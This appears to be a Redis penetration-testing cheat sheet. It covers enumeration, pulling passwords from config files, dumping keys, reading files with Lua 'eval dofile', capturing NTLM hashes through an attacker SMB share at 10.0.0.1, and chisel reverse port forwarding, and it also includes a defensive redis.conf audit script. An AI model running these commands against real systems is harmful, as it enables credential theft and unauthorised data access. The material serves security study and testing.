Redis Pentesting
Last modified: 2023-02-05
Redis is an in-memory database. The default port is 6379.
Enumeration
nmap --script redis-info -p 6379 <target-ip>
nmap --script redis-brute -p 6379 <target-ip>
msf> use auxiliary/scanner/redis/redis_server
Check Config File
If we have access to the target system, locate the configuration file; it may contain the password.
find / -name "redis.conf" 2>/dev/null
grep -i pass /path/to/redis.conf
If we find a line with the password written as below,
requirepass "password"
we can authenticate with it in a Redis client.
> auth "password"
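As an added example that is not part of the original page, the following Python script turns the configuration check above into a hardening audit: it parses a redis.conf and reports settings that leave the server reachable without AUTH or with the CONFIG/EVAL commands exposed. The directive names are Redis's own; both configuration fragments are constructed samples.

```python
# Constructed redis.conf fragments: a weak one and a hardened one (not real files).
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
# requirepass "password"
rename-command FLUSHALL ""
"""
HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
requirepass "replace-with-a-long-random-secret"
rename-command CONFIG ""
rename-command EVAL ""
"""

def parse_redis_conf(text):
    """Map each directive (lowercased) to the list of its argument strings."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        value = parts[1].strip() if len(parts) > 1 else ""
        # requirepass "password"  ->  password
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        settings.setdefault(parts[0].lower(), []).append(value)
    return settings

def audit_redis_conf(text):
    """Return findings about authentication, exposure and dangerous commands."""
    s = parse_redis_conf(text)
    findings = []
    # No requirepass and no ACL users: every client gets the full command set.
    if not any(k in s for k in ("requirepass", "user", "aclfile")):
        findings.append("no requirepass or ACL user: commands accepted without AUTH")
    if s.get("protected-mode", ["yes"])[-1].lower() == "no":
        findings.append("protected-mode disabled")
    # No bind directive, 0.0.0.0, * or ::* all mean listening on every interface.
    binds = s.get("bind", ["0.0.0.0"])[-1].split()
    if any(b.lstrip("-") in ("0.0.0.0", "*", "::", "::*") for b in binds):
        findings.append("bind exposes the port on all interfaces")
    # CONFIG and EVAL stay reachable unless renamed (ACL rules are not inspected here).
    renamed = {v.split()[0].lower() for v in s.get("rename-command", []) if v}
    for cmd in ("config", "eval"):
        if cmd not in renamed:
            findings.append(f"{cmd} command not renamed")
    return findings
```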
Connect
redis-cli -h <target-ip> -p 6379
# with password
redis-cli -h <target-ip> -p 6379 -a password
After connecting, the first command we run may return the following output.
NOAUTH Authentication required.
If so, we need to authenticate before the Redis server will accept commands.
> auth <password>
# or
> auth default <password>
# or
> auth <username> <password>
Commands
# Check credentials
> auth <username> <password>
> auth default <password>
# Set a password temporarily (it is lost when the service restarts).
> config set requirepass <password>
# Information on the Redis server
> info
> info keyspace
# List all configuration parameters
> config get *
# Number of configured databases
> config get databases
# Select the database ('select <index>')
> select 0
> select 1
> select 12
# Read files and directories using Lua scripts
> eval "dofile('C:\\\\Users\\\\Administrator\\\\Desktop\\\\user.txt')" 0
> eval "dofile('C:\\\\Users\\\\<username>\\\\Desktop\\\\user.txt')" 0
Get a Key Value
First find all keys.
> keys *
Before reading a key's value, determine its type with the "type" command.
# Get the type of value
> type <key_name>
Once we know the type, we can read the value as below.
# type: string
> get <key_name>
# type: hash
> hget <key_name> <field>
> hmget <key_name> <field> [<field> ...]
> hgetall <key_name>
# type: lists
> lrange <key_name> <start> <stop>
# e.g.
> lrange "userlist" 0 0
> lrange "userlist" 0 5
# type: sets
> smembers <key_name>
# type: sorted sets
> zrangebyscore <key_name> <min> <max>
# type: stream
> xread count <count> streams <key_name> <id>
NTLM Hash Disclosure
On the local machine, start an SMB server.
mkdir share
sudo impacket-smbserver share ./share/ -smb2support
Now execute the following command in the Redis client.
> eval "dofile('//10.0.0.1/share')" 0
We may capture an NTLM hash from the incoming connection to the SMB server; it appears in the SMB server's terminal output.
If an NTLM hash is captured, crack it.
Port Forwarding Redis Server to Local Machine
On the local machine,
chisel server -p 9001 --reverse
On the target machine,
./chisel client <local-ip>:9001 R:6379:127.0.0.1:6379